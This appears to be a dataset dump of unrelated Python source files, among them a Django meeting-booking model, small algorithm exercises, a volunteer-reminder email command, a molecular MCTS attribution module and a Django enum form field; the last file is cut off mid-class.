text stringlengths 38 1.54M |
|---|
#! /usr/bin/env python
#coding=utf-8
from base.models import AppOperation
from django.db import models
from base.models import CachingModel
from base.operation import Operation,ModelOperation
from django.utils.translation import ugettext_lazy as _
from dbapp.datautils import filterdata_by_user
from base.middleware import threadlocals
from type import TypeForeignKey
from mysite.meeting.models.room import Room,RoomManyToManyFieldKey
#from room import Room,RoomForeignKey
import datetime
import re
YESORNO = (
(1, _(u'是')),
(0, _(u'否')),
)
def get_endtime(self, starttime, continuetime):
#获得会议结束时间,如果会议 持续到第二天则无效。。但不会报错或提示
h = starttime.hour
m = starttime.minute
if continuetime >= 60:
if h < 23:
h = h + 1
m = m + (continuetime - 60)
if continuetime + m >= 60:
if h < 23:
h = h + 1
m = (m + continuetime) - 60
else:
m = m + continuetime
return time(h, m, starttime.second)
class MeetingEntity(CachingModel):
id = models.AutoField(db_column="id",primary_key=True,editable=False)#勿删,会议统计会用到该属性
numberMeeting = models.CharField(verbose_name=_(u'会议编号'),max_length=20)
nameMeeting = models.CharField(verbose_name=_(u'会议名称'), max_length=40,)
typeMeeting =TypeForeignKey(verbose_name=_(u'会议室类型'),null=True,blank=True,editable=False)
roomMeeting = models.ForeignKey(Room,verbose_name=_(u'会议室'), editable=True)
startTime = models.DateTimeField(verbose_name=_(u'开始时间'))
endTime = models.DateTimeField(verbose_name=_(u'结束时间'))
lateAllow = models.IntegerField(verbose_name=_(u'允许迟到(分钟)'),default=0)
leaveAllow = models.IntegerField(verbose_name=_(u'允许早退(分钟)'),default=0)
startCheckInTime = models.DateTimeField(verbose_name=_(u'会议开始签到时间'))
endCheckInTime = models.DateTimeField(verbose_name=_(u'会议结束签到时间'))
startCheckOutTime = models.DateTimeField(verbose_name=_(u'会议开始签退时间'))
endCheckOutTime = models.DateTimeField(verbose_name=_(u'会议结束签退时间'))
remark = models.TextField(verbose_name=_(u'内容纪要'),blank=True,null=True)
def __unicode__(self):
return '%s %s' % (self.numberMeeting, self.nameMeeting)
def save(self):
from statisticsMeeting import StatisticsMeeting
if len(self.numberMeeting)>20:
raise Exception(_(u'会议编号长度不能超过20位有效字符'))
if len(self.nameMeeting)>40:
raise Exception(_(u'会议名称长度不能超过40个有效字符'))
p = re.compile(r'^[a-zA-Z0-9]*$')
if not p.match(self.numberMeeting):
raise Exception(_(u"会议编号只能为数字或字母"))
ee = MeetingEntity.objects.filter(numberMeeting=self.numberMeeting)
if len(ee)>0 and not self.id:
raise Exception(_(u'会议编号已存在'))
if not self.roomMeeting.isUse:
raise Exception(_(u'会议室处于无法使用状态'))
eNam = MeetingEntity.objects.filter(nameMeeting=self.nameMeeting)
if not self.id and len(eNam) >0:
raise Exception(_(u'会议名称已存在'))
if self.endTime <= self.startTime:
raise Exception(_(u'结束时间不应小于开始时间'))
if self.startTime.day != self.endTime.day or (self.endTime - self.startTime).seconds/3600 >= 8:
raise Exception(_(u'本系统暂不支持跨天或超过8小时的大型会议'))
if datetime.timedelta(minutes=(self.lateAllow+self.lateAllow))>=(self.endTime-self.startTime):
raise Exception(_(u'允许迟到、早退设置不合理'))
if self.startCheckInTime > self.startTime:
raise Exception(_(u'开始签到时间不应大于会议开始时间'))
if self.endCheckInTime <= (self.startTime + datetime.timedelta(minutes=(self.lateAllow))):
raise Exception(_(u'结束签到时间不应小于或等于会议开始时间加允许迟到时间'))
if self.startCheckOutTime > (self.endTime-datetime.timedelta(minutes=(self.leaveAllow))):
raise Exception(_(u'开始签退时间不应大于会议结束时间减允许早退时间'))
if self.startCheckOutTime > self.endCheckOutTime:
raise Exception(_(u'开始签退时间不应小于结束签退时间'))
if self.endCheckInTime > (self.endTime-datetime.timedelta(minutes=(self.leaveAllow))):
raise Exception(_(u'结束签到时间不应大于会议结束时间减允许早退时间'))
if self.endCheckOutTime <= self.endTime:
raise Exception(_(u'结束签退时间不应小于或等于会议结束时间'))
if self.id:
mE = MeetingEntity.objects.get(id=self.id)
if mE.numberMeeting != self.numberMeeting:
raise Exception(_(u"会议编号不可修改"))
meetingAll = MeetingEntity.objects.all()
if len(meetingAll)>0 :
for meeting in meetingAll :
if self.roomMeeting == meeting.roomMeeting and self.numberMeeting != meeting.numberMeeting and self.startTime.date() == meeting.startTime.date() and self.startCheckInTime >= meeting.startCheckInTime and self.startCheckInTime <= meeting.endCheckOutTime:
raise Exception(_(u'该时间段内会议室已被占用'))
if self.roomMeeting == meeting.roomMeeting and self.numberMeeting != meeting.numberMeeting and self.startTime.date() == meeting.startTime.date() and self.endCheckOutTime >= meeting.startCheckInTime and self.endCheckOutTime <= meeting.endCheckOutTime:
raise Exception(_(u'该时间段内会议室已被占用'))
if self.roomMeeting == meeting.roomMeeting and self.numberMeeting != meeting.numberMeeting and self.startTime.date() == meeting.startTime.date() and self.startCheckInTime <= meeting.startCheckInTime and self.endCheckOutTime >= meeting.endCheckOutTime:
raise Exception(_(u'该时间段内会议室已被占用'))
#
if self.id:
eNam = MeetingEntity.objects.filter(nameMeeting=self.nameMeeting)
ee = MeetingEntity.objects.filter(numberMeeting=self.numberMeeting)
if len(eNam)>0 and len(ee)>0 and ee[0].id != eNam[0].id:
raise Exception(_(u'会议名称已存在'))
super(MeetingEntity,self).save()
me = MeetingEntity.objects.get(id=self.id)
sMeeting = StatisticsMeeting.objects.filter(meetingID=me)
if len(sMeeting)<1:
sm = StatisticsMeeting()
sm.meetingID = me
sm.save()
def delete(self):
from meeting_emp import MeetingEmp
from statisticsMeeting import StatisticsMeeting
m = MeetingEntity.objects.get(id=self.id)
if len(MeetingEmp.objects.filter(meetingID=m))>0:
raise Exception(_(u'会议中还有人员,不能删除'))
super(MeetingEntity,self).delete()
try:
me = MeetingEntity.objects.get(id=self.id)
sm = StatisticsMeeting.objects.get(meetingID=me)
sm.delete()
except:
pass
class Admin(CachingModel.Admin): #管理该模型
menu_group = 'meeting' #在哪个app应用下
menu_index=3 #菜单的摆放的位置
query_fields=['numberMeeting','nameMeeting','roomMeeting.nameRoom','startTime','endTime'] #需要查找的字段
# adv_fields=['code','datetime','type','startTime']
list_display=['numberMeeting','nameMeeting','roomMeeting.nameRoom','startTime','endTime'] #列表显示那些字段
sort_fields=['numberMeeting','startTime'] #需要排序的字段,放在列表中
class Meta:
verbose_name=_(u'会议')#名字
verbose_name_plural=verbose_name
app_label= 'meeting' #属于哪个app
class MeetingForeignKey(models.ForeignKey):
def __init__(self, to_field=None, **kwargs):
super(MeetingForeignKey, self).__init__(MeetingEntity, to_field=to_field, **kwargs)
class MeetingManyToToManyField(models.ManyToManyField):
def __init__(self, *args, **kwargs):
super(MeetingManyToToManyField, self).__init__(MeetingEntity,*args, **kwargs)
#
#def update_dept_widgets():
# from dbapp import widgets
# if MeetingManyToToManyField not in widgets.WIDGET_FOR_DBFIELD_DEFAULTS:
# from meeting_widget import ZDeptMultiChoiceWidget
# widgets.WIDGET_FOR_DBFIELD_DEFAULTS[MeetingManyToToManyField]= ZDeptMultiChoiceWidget
#
##update_dept_widgets()
|
""" This basically returns a list of all the palindromes from subsequences of a string"""
def get_palindromes_for_string(string: str):
if len(string) == 1:
return [string]
from pprint import pprint
def get_i_j(l:list):
len_l = len(l)
if len_l == 2:
return 0, 1
if len_l % 2 == 0:
return (len_l//2-1), len_l//2
else:
print(l)
raise Exception('What THE FUCKK>?')
incidence_matrix = []
for _ in range(len(string)):
incidence_matrix.append([False] * len(string))
matches = {0: []}
palindromes = []
for row_idx in range(len(incidence_matrix)):
for col_idx in range(len(incidence_matrix[row_idx])):
if row_idx != col_idx and string[row_idx] == string[col_idx] and row_idx < col_idx:
matches[0].append([row_idx, col_idx])
palindromes.append(string[row_idx] + string[col_idx])
for k in range(1, (len(string)//2)+1):
for pal in matches[k-1]:
i_idx, j_idx = get_i_j(pal)
f_i, f_j = pal[i_idx], pal[j_idx]
for o_pal in matches[0]:
i, j = o_pal[0], o_pal[1]
if i > f_i and j < f_j:
if k not in matches:
matches[k] = []
new_palindrome_indexes = pal[:i_idx+1] + [i, j] + pal[j_idx:]
matches[k].append(new_palindrome_indexes)
palindromes.append(''.join(string[p] for p in new_palindrome_indexes))
# matches[k].append([f_i, i, j, f_j])
if len(string) % 2 != 0 and string == string[::-1]:
palindromes.append(string)
return palindromes + list(string) |
# STACK클래스 생성
class Stack:
def __init__(self):
self.myStack = []
def push(self, n):
self.myStack.append(n)
def pop(self):
if self.empty() == 1:
return
else:
self.myStack.pop()
def size(self):
return len(self.myStack)
def empty(self):
if self.size() == 0:
return 1
else:
return 0
def top(self):
if self.empty() == 1:
return -1
else:
return self.myStack[-1]
def checkParen(p): # 괄호 문자열 p의 쌍이 맞으면 "YES", 아니면 "NO"를 반환
s = Stack()
for c in p:
if c == '(':
s.push(c)
else:
if s.empty() == 1:
return "NO"
s.pop()
if s.empty() == 1:
return "YES"
else:
return "NO"
return "NO"
|
from django.conf import settings
from django.core.mail import EmailMessage
from django.core.management.base import BaseCommand
from django.utils import timezone
from common.helpers.constants import FrontEndSection
from common.helpers.front_end import section_path
from common.helpers.date_helpers import DateTimeFormats, datetime_field_to_datetime, datetime_to_string
from democracylab.emails import send_email,_get_account_from_email, send_volunteer_conclude_email, HtmlEmailTemplate, \
notify_project_owners_volunteer_concluded_email, EmailAccount
class Command(BaseCommand):
def handle(self, *args, **options):
if not settings.VOLUNTEER_RENEW_REMINDER_PERIODS:
print('Please set VOLUNTEER_RENEW_REMINDER_PERIODS before running volunteer_renewal_reminders')
return
now = timezone.now()
from civictechprojects.models import VolunteerRelation
volunteer_applications = VolunteerRelation.objects.all()
for volunteer_relation in volunteer_applications:
if volunteer_relation.is_up_for_renewal(now):
if now > volunteer_relation.projected_end_date:
if volunteer_relation.is_approved:
# Don't send conclusion emails if volunteer wasn't approved
send_volunteer_conclude_email(volunteer_relation.volunteer, volunteer_relation.project.project_name)
notify_project_owners_volunteer_concluded_email(volunteer_relation)
user = volunteer_relation.volunteer
volunteer_relation.delete()
volunteer_relation.project.recache()
user.purge_cache()
elif volunteer_relation.is_approved:
# Don't send reminders if volunteer isn't approved
email_template = get_reminder_template_if_time(now, volunteer_relation)
if email_template:
send_reminder_email(email_template, volunteer_relation)
volunteer_relation.re_enroll_reminder_count += 1
volunteer_relation.re_enroll_last_reminder_date = now
volunteer_relation.save()
def get_reminder_template_if_time(now, volunteer):
reminder_interval_days = settings.VOLUNTEER_RENEW_REMINDER_PERIODS
if not volunteer.re_enroll_last_reminder_date:
return volunteer_reminder_emails[0]
else:
days_since_last_reminder = (now - volunteer.re_enroll_last_reminder_date).days
days_to_next_reminder = reminder_interval_days[min(volunteer.re_enroll_reminder_count, len(reminder_interval_days) - 1)]
return (days_to_next_reminder > 0) and (days_since_last_reminder >= days_to_next_reminder) and volunteer_reminder_emails[volunteer.re_enroll_reminder_count]
# TODO: Update for redis queue changes
def send_reminder_email(email_template, volunteer_relation):
project = volunteer_relation.project
volunteer = volunteer_relation.volunteer
context = {
'first_name': volunteer.first_name,
'project_name': project.project_name,
'project_end_date': datetime_to_string(datetime_field_to_datetime(volunteer_relation.projected_end_date), DateTimeFormats.DATE_LOCALIZED),
'volunteer_start_date': datetime_to_string(datetime_field_to_datetime(volunteer_relation.application_date), DateTimeFormats.DATE_LOCALIZED)
}
email_msg = EmailMessage(
subject="You're making a difference at " + project.project_name,
from_email=_get_account_from_email(EmailAccount.EMAIL_VOLUNTEER_ACCT),
to=[volunteer.email],
)
email_msg = email_template.render(email_msg, context)
send_email(email_msg, EmailAccount.EMAIL_VOLUNTEER_ACCT)
review_commitment_url = settings.PROTOCOL_DOMAIN + section_path(FrontEndSection.MyProjects, {'from': 'renewal_notification_email'})
def get_first_email_template():
return HtmlEmailTemplate() \
.header("You're making a difference at {{project_name}}") \
.paragraph("Hi {{first_name}},") \
.paragraph("Thank you for your involvement with {{project_name}} since {{volunteer_start_date}}. "
"We appreciate your contributions to this project!") \
.paragraph("Your current volunteer commitment ends on {{project_end_date}}.") \
.paragraph("However, we hope you'll consider extending your commitment and remaining a part of the DemocracyLab community.") \
.button(url=review_commitment_url, text="Review Volunteer Commitment")
def get_second_email_template():
return HtmlEmailTemplate() \
.header("We appreciate your contributions to {{project_name}}") \
.paragraph("{{first_name}},") \
.paragraph("You have been essential to the success of {{project_name}}."
"Your volunteer commitment is coming to a close, "
"but we hope you'll consider staying on and renewing your volunteer engagement.") \
.paragraph("Thank you again for being a part of our tech-for-good community.") \
.button(url=review_commitment_url, text='Review Volunteer Commitment')
volunteer_reminder_emails = [get_first_email_template(), get_second_email_template()]
|
from os import environ
MONGO_SERVER = environ['MONGO_SERVER']
MONGO_USER = environ['MONGO_USER']
MONGO_PASSWORD = environ['MONGO_PASSWORD']
CONTRACT_ADDRESS = environ['CONTRACT_ADDRESS']
APP_ADDRESS = environ['APP_ADDRESS']
CONTRACT_PROVIDER = environ['CONTRACT_PROVIDER']
|
from guizero import App , Text, PushButton,yesno, warn, info, MenuBar, Picture
app = App(title="trashbot ", height = 500, width = 700, bgcolor = "black")
#Bienvenida al programa "Trashbot"
join_the_trashbot= yesno("Welcome", "Do you want to join trashbot?")
if join_the_trashbot == True:
info("Welcome", "Thank you!")
else:
app.destroy()
message = Text(app, text="Join trashbot", color = "red")
def icon ():
print("start")
icon = PushButton(app, command= "giftrobot.gif")
def edit_function():
print("Edit option")
def file_function():
print("File option")
def edit_function():
print("Edit option")
#app = App()
menubar = MenuBar(app,
toplevel=["Robot", "Contaminacion en el mundo", "ventajas del Trashbot","como podemos fomentar esto"],
options=[
[ ["mecanismo", file_function], ["electronica y programacion", file_function] ],
[ ["cuanto afecta", edit_function], ["tipos de contaminacion", edit_function] ],
[ ["Analiza y separa la basura", file_function], ["mantiene limpio el entorno", file_function] ],
[ ["metodos de educacion ambiental", edit_function], ["En redes sociales ya que tienen demasiado impacto mundial", edit_function] ]
])
app.display()
|
Mouse = '''
class Mouse:
"""STOP!!! DON'T USE THIS UNLESS YOU'RE REALLY SURE YOU KNOW HOW TO USE IT!!
Nothing bad will happen, but it just won't really help you much. Peace.
"""
def __init__(self):
"""Mouse.__init__()"""
## button press things
self.justpressed = (0,0,0)
## visible
self.visible = True
@property
def pos(self): return py.mouse.get_pos()
@property
def x(self): return self.pos[0]
@property
def y(self): return self.pos[1]
@property
def arepressed(self): return py.mouse.get_pressed()
@property
def leftbutton(self): return self.arepressed[0]
@property
def scrollwheel(self): return self.arepressed[1]
@property
def rightbutton(self): return self.arepressed[2]
@property
def leftbuttonpressed(self): return self.justpressed[0]
@property
def scrollwheelpressed(self): return self.justpressed[1]
@property
def rightbuttonpressed(self): return self.justpressed[2]
def __setattr__(self, name, value) -> None:
"set self.name to value"
## These actually aren't pointless!
## These are the mouse things we can change in pygame
if name == 'justpressed':
self.__dict__['justpressed'] = value
elif name == 'visible':
py.mouse.set_visible(value)
elif name == 'pos':
py.mouse.set_pos(value)
elif name == 'x':
py.mouse.set_pos([value,self.y])
elif name == 'y':
py.mouse.set_pos([self.x,value])
else:
if name in self.__dict__:
raise AttributeError(f"You can't change Mouse attribute '{name}'")
else:
raise AttributeError(f"Mouse has no attribute '{name}'")
'''
|
import abc
import torch
from typing import Any, Callable, List, MutableMapping, Optional, Text, Tuple
import math
from functools import partial
from multiprocessing import Pool
import numpy as np
from rdkit import Chem
from rdkit import rdBase
from rdkit.Chem import AllChem
from rdkit import DataStructs
import os
import pickle
from MolRep.Explainer.Attribution.utils.fuseprop import find_clusters, extract_subgraph
from MolRep.Explainer.Attribution.utils.fuseprop.chemprop_utils import *
from MolRep.Explainer.Attribution.utils.gnn_utils import *
MIN_ATOMS = 3
C_PUCT = 10
class MCTSNode():
def __init__(self, smiles, atoms, W=0, N=0, P=0):
self.smiles = smiles
self.atoms = set(atoms)
self.children = []
self.W = W
self.N = N
self.P = P
def Q(self):
return self.W / self.N if self.N > 0 else 0
def U(self, n):
return C_PUCT * self.P * math.sqrt(n) / (1 + self.N)
class MCTS:
def __init__(self, name: Optional[Text] = None,
rollout=20, c_puct=10, max_atoms=15, min_atoms=3, prop_delta=0.3, ncand=1, ncpu=2):
self.name = name or self.__class__.__name__
self.rollout = rollout
self.c_puct = c_puct
self.max_atoms = max_atoms
self.min_atoms = min_atoms
self.prop_delta = prop_delta
self.ncand = ncand
self.ncpu = ncpu
def attribute(self, data, model, model_name, scaler=None):
# smiles, mol_batch, features_batch, atom_descriptors_batch = data
# data = (mol_batch, features_batch, atom_descriptors_batch)
smiles = data.smiles[0]
output = model(data)
if not isinstance(output, tuple):
output = (output,)
results = mcts_search(smiles, model, model_name, scaler,
rollout=self.rollout, max_atoms=self.max_atoms,
prop_delta=self.prop_delta, ncpu=self.ncpu)
node_weights = self.get_attribution_results(smiles, results)
return node_weights, None, output
def get_attribution_results(self, smiles, results):
mol = Chem.MolFromSmiles(smiles)
node_weights = np.zeros(len(mol.GetAtoms()))
orig_smiles, rationales = results
rationales = sorted(rationales, key=lambda x:len(x.atoms))
for x in rationales[:self.ncand]:
mol = Chem.MolFromSmiles(orig_smiles)
sub = Chem.MolFromSmiles(x.smiles)
subgraph_truth = mol.GetSubstructMatch(sub)
node_weights[list(subgraph_truth)] = 1
return node_weights
def mcts_rollout(node, state_map, orig_smiles, clusters, atom_cls, nei_cls, scoring_function):
print('cur_node', node.smiles)
cur_atoms = node.atoms
if len(cur_atoms) <= MIN_ATOMS:
return node.P
# Expand if this node has never been visited
if len(node.children) == 0:
cur_cls = set( [i for i,x in enumerate(clusters) if x <= cur_atoms] )
for i in cur_cls:
leaf_atoms = [a for a in clusters[i] if len(atom_cls[a] & cur_cls) == 1]
if len(nei_cls[i] & cur_cls) == 1 or len(clusters[i]) == 2 and len(leaf_atoms) == 1:
new_atoms = cur_atoms - set(leaf_atoms)
new_smiles, _ = extract_subgraph(orig_smiles, new_atoms)
#p rint('new_smiles', node.smiles, '->', new_smiles)
if new_smiles in state_map:
new_node = state_map[new_smiles] # merge identical states
else:
new_node = MCTSNode(new_smiles, new_atoms)
if new_smiles:
node.children.append(new_node)
state_map[node.smiles] = node
if len(node.children) == 0: return node.P # cannot find leaves
scores = scoring_function([x.smiles for x in node.children])
for child, score in zip(node.children, scores):
if np.array(score).ndim == 1:
child.P = score
else:
child.P = 1 - score[0][0]
sum_count = sum([c.N for c in node.children])
selected_node = max(node.children, key=lambda x : x.Q() + x.U(sum_count))
v = mcts_rollout(selected_node, state_map, orig_smiles, clusters, atom_cls, nei_cls, scoring_function)
selected_node.W += v
selected_node.N += 1
return v
def mcts(smiles, scoring_function, n_rollout, max_atoms, prop_delta):
mol = Chem.MolFromSmiles(smiles)
clusters, atom_cls = find_clusters(mol)
nei_cls = [0] * len(clusters)
for i,cls in enumerate(clusters):
nei_cls[i] = [nei for atom in cls for nei in atom_cls[atom]]
nei_cls[i] = set(nei_cls[i]) - set([i])
clusters[i] = set(list(cls))
for a in range(len(atom_cls)):
atom_cls[a] = set(atom_cls[a])
root = MCTSNode(smiles, set(range(mol.GetNumAtoms())) )
state_map = {smiles : root}
for _ in range(n_rollout):
mcts_rollout(root, state_map, smiles, clusters, atom_cls, nei_cls, scoring_function)
rationales = [node for _,node in state_map.items() if len(node.atoms) <= max_atoms and node.P >= prop_delta]
return smiles, rationales
def mcts_search(data, model, model_name, scaler=None,
rollout=20, max_atoms=15, prop_delta=0.3, ncpu=4):
scoring_function = get_scoring_function(model, model_name, scaler)
# work_func = partial(mcts, scoring_function=scoring_function,
# n_rollout=rollout,
# max_atoms=max_atoms,
# prop_delta=prop_delta)
# pool = Pool(ncpu)
# results = pool.map(work_func, data)
results = mcts(smiles=data, scoring_function=scoring_function, n_rollout=rollout, max_atoms=max_atoms, prop_delta=prop_delta)
return results
class chemprop_model():
def __init__(self, model, scaler=None):
self.model = model
self.scaler = scaler
def __call__(self, smiles, batch_size=1):
test_data = get_data_from_smiles(smiles=smiles)
valid_indices = [i for i in range(len(test_data)) if test_data[i].mol is not None]
full_data = test_data
test_data = MoleculeDataset([test_data[i] for i in valid_indices])
model_preds = predict(
model=self.model,
data=test_data,
batch_size=batch_size,
scaler=self.scaler
)
# Put zero for invalid smiles
full_preds = [0.0] * len(full_data)
for i, si in enumerate(valid_indices):
full_preds[si] = model_preds[i]
return np.array(full_preds, dtype=np.float32)
class gnn_model:
def __init__(self, model, scaler=None):
self.model = model
self.scaler = scaler
def __call__(self, smiles, batch_size=500):
test_data, valid_indices = get_gnn_data_from_smiles(smiles=smiles)
model_preds = gnn_predict(
model=self.model,
test_data=test_data,
scaler=self.scaler,
device='cuda'
)
# Put zero for invalid smiles
full_preds = [0.0] * len(smiles)
for i, si in enumerate(valid_indices):
full_preds[si] = model_preds[i]
return np.array(full_preds, dtype=np.float32)
def get_scoring_function(model, model_name, scaler):
"""Function that initializes and returns a scoring function by name"""
if model_name in ['DMPNN', 'CMPNN']:
return chemprop_model(model=model, scaler=scaler)
if model_name in ['DGCNN', 'GIN', 'ECC', 'GraphSAGE', 'DiffPool', 'GraphNet', 'GAT', 'PyGCMPNN']:
return gnn_model(model=model, scaler=scaler)
|
class Solution:
def numSubarraysWithSum(self, A: List[int], S: int) -> int:
l = 0
count = 0
ans = 0
currSum = 0
for r in range(len(A)):
currSum += A[r]
if A[r] == 1:
count = 0
while l <= r and currSum >= S:
if currSum == S:
count += 1
currSum -= A[l]
l += 1
ans += count
return ans |
import sys
sys.path.append('../')
from roleplay import *
main.roleplayRun()
#main.IllustrationTest() |
from flask import Blueprint
from flask import jsonify
from api.utils import get_zone_facts_select_columns
import logging
from flask_cors import cross_origin
def construct_filter_blueprint(name, engine):
blueprint = Blueprint(name, __name__, url_prefix='/api')
@blueprint.route('/filter/', methods=['GET'])
@cross_origin()
def filter_data():
ward_selects, cluster_selects, tract_selects = get_zone_facts_select_columns(engine)
q = """
select
p.nlihc_id
, p.proj_addre
, p.proj_name
, CONCAT(p.proj_name, ': ', p.proj_addre) as proj_name_addre
, p.proj_units_tot
, p.proj_units_assist_max
, cast(p.proj_units_assist_max / p.proj_units_tot as decimal(3,2)) as percent_affordable_housing --TODO make this calculated field in projects table
, p.hud_own_type
, p.ward
, p.anc
, p.census_tract
, p.neighborhood_cluster
, p.neighborhood_cluster_desc
, p.zip
, s.portfolio
, s.agency
, to_char(s.poa_start, 'YYYY-MM-DD') as poa_start
, to_char(s.poa_end, 'YYYY-MM-DD') as poa_end
, to_char(s.poa_start_orig, 'YYYY-MM-DD') as poa_start_orig
, s.units_assist
, s.subsidy_id
"""
q += ward_selects
q += cluster_selects
q += tract_selects
q += """
from project as p
left join zone_facts as z1 on z1.zone = p.ward
left join zone_facts as z2 on z2.zone = p.neighborhood_cluster
left join zone_facts as z3 on z3.zone = p.census_tract
left join subsidy as s on s.nlihc_id = p.nlihc_id
"""
conn = engine.connect()
proxy = conn.execute(q)
results = [dict(x) for x in proxy.fetchall()]
conn.close()
output = {'objects': results}
return jsonify(output)
#End of the constructor returns the assembled blueprint
return blueprint
|
# Se RECOMIENDA INDENTAR un DICCIONARIO para que sea mas CLARO de LEER.
# Se RECOMIENDA FINALIZAR un DICCIONARIO con una COMA FINAL(,)
person = {
'first_name': 'javier',
'last_name': 'ramon',
'age': 41, 'city':
'teruel',
}
print('Person Profile:')
print('---------------')
print('First Name: {}'.format(person['first_name'].capitalize()))
print('Last Name: {}'.format(person['last_name'].capitalize()))
print('Age: {}'.format(person['age']))
print('City: {}'.format(person['city'].capitalize()))
'''
FORMAS DE RECORRER UN DICCIONARIO CON UN BUCLE FOR:
'''
# Recorre las CLAVES del DICCIONARIO.
for key in person.keys():
print(person[key])
# Recorre los VALORES del DICCIONARIO.
for value in person.values():
print(value)
# Recorre los ELEMENTOS(Clave/Valor) de un DICCIONARIO.
# Donde CADA ELEMENTO es una TUBLA de DOS VALORES, CLAVE y VALOR.
for key, value in person.items():
print(value)
'''
Podemos DEFINIR una PAREJA de VARIABLES en el FOR para GUARDAR
cada uno de los VALORES del PAR CLAVE/VALOR de un DICCIONARIO
En lugar de tener que trabajar DIRECTAMENTE con la TUPLA que
DEVUELVE 'nombre_diccionario.items()'
''' |
from collections import defaultdict
def findMin(nums):
add = 0
store = defaultdict(int)
glbMin = float('inf')
for i in range(len(nums)):
add = add + nums[i]
store[i] = add
for i in range(len(nums)):
value = store[len(nums)-1]-store[i] -store[i]
if value > 0 and value in nums:
glbMin = min(glbMin, value)
if glbMin > 0 and glbMin != float('inf'):
return glbMin
return -1
nums = [0,2,3]
print(findMin(nums)) |
from __future__ import unicode_literals
from functools import partial
from .handlers import store_initial, action_receiver, TrackHistoryModelWrapper
from django.db.models.signals import post_init, post_save, pre_delete
from .manager import TrackHistoryDescriptor
from .settings import (
TH_DEFAULT_EXCLUDE_FIELDS,
DJANGO_SAFEDELETE_INSTALLED,
pre_softdelete,
)
def track_changes(model=None, fields=(), exclude=()):
if fields and exclude:
raise AttributeError(
"Attributes fields and exclude can not be specified together. Use only one of them."
)
if model is None:
return partial(track_changes, fields=fields, exclude=exclude)
# Remove possible duplications
attrs = {
"_th_fields": tuple(set(fields)),
"_th_exclude": tuple(set(exclude + TH_DEFAULT_EXCLUDE_FIELDS)),
}
# Connect to signals
post_init.connect(
partial(store_initial, **attrs),
sender=model,
weak=False,
dispatch_uid="django-track-history-{}".format(model.__name__),
)
post_save.connect(
action_receiver,
sender=model,
weak=False,
dispatch_uid="django-track-history-{}".format(model.__name__),
)
pre_delete.connect(
action_receiver,
sender=model,
weak=False,
dispatch_uid="django-track-history-{}".format(model.__name__),
)
if DJANGO_SAFEDELETE_INSTALLED:
pre_softdelete.connect(
action_receiver,
sender=model,
weak=False,
dispatch_uid="django-track-history-{}".format(model.__name__),
)
# Hack model to inherent from TrackHistoryModelWrapper
model.__bases__ = (TrackHistoryModelWrapper,) + model.__bases__
# Add query manager
descriptor = TrackHistoryDescriptor(model)
setattr(model, "history", descriptor)
return model
__all__ = ["track_changes"]
|
import numpy as np
import pandas as pd
import logging
import warnings
from pandas.core.indexes.base import Index
from typing import (
Iterable,
List,
)
import artm
from topicnet.cooking_machine import Dataset
from topicnet.cooking_machine.models import TopicModel
_logger = logging.getLogger()
# TODO: seems like method suitable for Dataset?
def get_phi_index(dataset: Dataset) -> Index:
artm_model_template = artm.ARTM(num_topics=1, num_processors=1)
artm_model_template.initialize(dictionary=dataset.get_dictionary())
model_template = TopicModel(artm_model=artm_model_template)
phi_template = model_template.get_phi()
phi_index = phi_template.index
del model_template
del artm_model_template
return phi_index
def _copy_phi(model: artm.ARTM, phi: pd.DataFrame, phi_ref: np.ndarray = None) -> np.ndarray:
model_wrapper = TopicModel(artm_model=model)
base_phi_index = model_wrapper.get_phi().index
# TODO: faster?
source_indices = list(phi.index)
target_indices = list()
found_indices = list()
not_found_indices = list()
not_found_indices_fraction_threshold = 0.5
for index in source_indices:
try:
target_index = base_phi_index.get_loc(index)
except KeyError:
not_found_indices.append(index)
else:
target_indices.append(target_index)
found_indices.append(index)
if len(not_found_indices) == 0:
pass
elif len(not_found_indices) < not_found_indices_fraction_threshold * len(source_indices):
warnings.warn(
f'There are {len(not_found_indices) / (1e-7 + len(source_indices)) * 100}% of words'
f' (i.e. {len(not_found_indices)} words)'
f' in the given Phi matrix'
f' which were not found in the model\'s Phi matrix'
)
else:
raise RuntimeError(
f'Not less than {not_found_indices_fraction_threshold * 100}% of words'
f' in the given Phi matrix with {len(source_indices)} words were not found'
f' in the model\'s Phi matrix with {len(base_phi_index)} words!'
f' Seems like doing initialization in such circumstances is not good'
)
_logger.debug(f'Attaching pwt and copying')
if phi_ref is None:
(_, phi_ref) = model.master.attach_model(
model=model.model_pwt
)
phi_ref[target_indices, :phi.shape[1]] = phi.loc[found_indices, :].values
return phi_ref
def _safe_copy_phi(
model: artm.ARTM,
phi: pd.DataFrame,
dataset: Dataset,
small_num_fit_iterations: int = 3) -> np.ndarray:
if small_num_fit_iterations == 0:
phi_ref = _copy_phi(model, phi)
return phi_ref
phi_ref = None
# TODO: small_num_fit_iterations bigger than 1 seems not working for big matrices
for _ in range(small_num_fit_iterations):
phi_ref = _copy_phi(model, phi, phi_ref=phi_ref)
model.fit_offline(dataset.get_batch_vectorizer(), 1)
return phi_ref
def _trim_vw(tokens: List[str]) -> Iterable[str]:
modality_start_symbol = '|'
for token in tokens:
if token.startswith(modality_start_symbol):
continue
if ':' not in token:
word = token
else:
word, frequency = token.split(':')
yield word
|
import enum
import re
from enum import unique
from typing import (
Any,
Callable,
Dict,
Literal,
NamedTuple,
Optional,
Sequence,
Type,
TypeVar,
Union,
cast,
get_type_hints,
)
from django import forms as django_forms
from django.forms.widgets import Widget
from django.http import HttpRequest, HttpResponse, JsonResponse
from django.template.response import TemplateResponse
from . import registry, serialization, stubs
from .fields import _GT, EnumChoiceIterator, coerce_to_enum
from .widgets import Autocomplete as Autocomplete
class EnumChoiceField(django_forms.TypedChoiceField):
def __init__(
self,
*,
coerce: Optional[Callable[[Any], Optional[_GT]]] = None,
empty_value: Optional[str] = "",
enum: Optional[Type[_GT]] = None,
choices: Optional[EnumChoiceIterator[_GT]] = None,
required: bool = True,
widget: Optional[Union[Widget, Type[Widget]]] = None,
label: Optional[str] = None,
initial: Optional[_GT] = None,
help_text: str = "",
error_messages: Optional[Any] = None,
show_hidden_initial: bool = False,
validators: Sequence[Any] = (),
localize: bool = False,
disabled: bool = False,
label_suffix: Optional[Any] = None,
) -> None:
"""When instantiated by a model form, choices will be populated and
enum will not, as Django strips all but a defined set of kwargs.
And coerce will be populated by the model as well.
When using this field directly in a form, enum will be populated and
choices and coerce should be None."""
if enum is not None and choices is None:
self.enum = enum
choices = EnumChoiceIterator(enum=enum, include_blank=required)
coerce = lambda value: coerce_to_enum(self.enum, value)
elif enum is None and choices is not None:
self.enum = choices.enum
else:
